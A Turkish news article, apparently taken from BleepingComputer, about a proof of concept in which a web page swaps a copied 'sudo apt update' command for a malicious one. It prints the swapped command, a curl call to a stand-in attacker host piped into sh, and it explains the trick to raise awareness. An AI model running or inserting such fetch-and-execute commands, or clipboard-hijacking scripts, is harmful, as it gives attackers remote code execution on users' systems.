Komutları Web Sayfalarından Kopyalayıp Yapıştırmak Hacklenmenize Yol Açabilir
Web sayfalarından komutları bir konsola veya terminale kopyalayıp yapıştıran programcılar, sistem yöneticileri, güvenlik araştırmacıları ve teknoloji meraklıları, sistemlerinin tehlikeye girme riskiyle karşı karşıya oldukları konusunda uyarıldı.
Bir teknoloji uzmanı, web sayfalarından metin kopyalayıp yapıştırmadan önce iki kez düşünmenizi sağlayacak basit bir hile gösterdi.
Kopyalama panonuzdaki arka kapı
Son zamanlarda, güvenlik bilinci eğitim platformu Wizer’in kurucusu Gabriel Friedlander, web sayfalarından komutları kopyalayıp yapıştırma konusunda dikkatli olmanızı sağlayacak bariz ama şaşırtıcı bir hack yöntemi gösterdi.
Acemi veya tecrübeli geliştiriciler için yaygın olarak kullanılan komutları bir web sayfasından (ahem, StackOverflow) kopyalayıp, uygulamalarına, bir Windows komut istemine veya bir Linux terminaline yapıştırmak alışılmadık bir durum değildir.
Ancak Friedlander, bir web sayfasının panonuzdaki içeriği değiştirilebileceği ve aslında panonuza kopyalanan şeyin, kopyalamayı amaçladığınızdan çok farklı şeylere sebep olabileceği konusunda uyarı yayınladı. Söz konusu tehlikenin asıl korkutucu kısmı ise, geliştirici veya sistem adminin ilgili komutu yapıştırıp uygulamaya geçirmesi.
Friedlander, blogunda yayınlanan basit bir kavram kanıtı ile (PoC) okuyuculardan çoğu sistem yöneticisinin ve geliştiricinin aşina olacağı basit bir komutu kopyalamalarını istedi:
Daha sonra da blogdan kopyalanmış olan metni herhangi bir yere yapıştırmalarını istedi ve söz konusu tehlikenin ciddiyetini tekrar gözler önüne sermiş oldu.
curl http://attacker-domain:8000/shell.sh | sh
Panonuzda yalnızca tamamen farklı bir komut haline gelmekle kalmaz, aynı zamanda işleri daha da kötüleştirmek için sonunda bir yeni satır (veya dönüş) karakteri de bulunur.
Bu, yukarıdaki örneğin doğrudan bir Linux terminaline yapıştırıldığı anda yürütüleceği anlamına gelir.
Metni yapıştıranlar, sisteminizde kurulu yazılımlarla ilgili güncel bilgileri almak için kullanılan tanıdık, zararsız sudo apt update komutunu kopyaladıkları izlenimine kapılmış olabilirler. Ama Friedlander’ın da kanıtladığı üzere yapılmak istenen ile yapılan şeyler tamamen farklı.
Bu basit dikkatsizlik nelere sebep olabilir?
Bunun yanıtı, Friedlander tarafından PoC HTML sayfsasının arkasına gizlenmiş JavaScript kodundadır.
Bir HTML öğesinde bulunan “sudo apt update” metnini kopyaladığınız anda, aşağıda gösterilen kod parçacığı çalışır. Devamında ise kötü iyetli olarak değiştirilmiş olan kod bir “olay dinleyicisi” olarak çalışmaya başlar.
Olay dinleyicilerinin JavaScript’te çeşitli meşru kullanım durumları olduğunu da unutmamak gerek, ancak bu senaryoda bilgisayar korsanlarının elinde çok tehlikeli bir silah haline gelebilir.
Friedlander, “Bu nedenle, yapıştır komutlarını ASLA doğrudan terminalinize kopyalamamalısınız” diyerek kullanıcıları şiddetli bir şekilde uyardı.
“Zararsız bir komut kopyaladığınızı düşünüyorsunuz, ancak bunun yerine kötü amaçlı kod gibi başka bir şey geliyor. Uygulamanıza bir arka kapı oluşturmak için yapmanız gereken tek şey kodunuza enjekte edilen tek bir kod satırı.”
“Bu saldırı çok basit, ama aynı zamanda çok da zararlı.”
Kaynak: bleepingcomputer.com
Diğer Haberler
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi Yayınlandı!
Microsoft, MS Exchange Kuyrukta Bekleme Sorunu İçin Çözüm Önerisi Paylaştı
Have I Been Pwned, RedLine Mağduru 441 Bin Hesabı Servisine Ekledi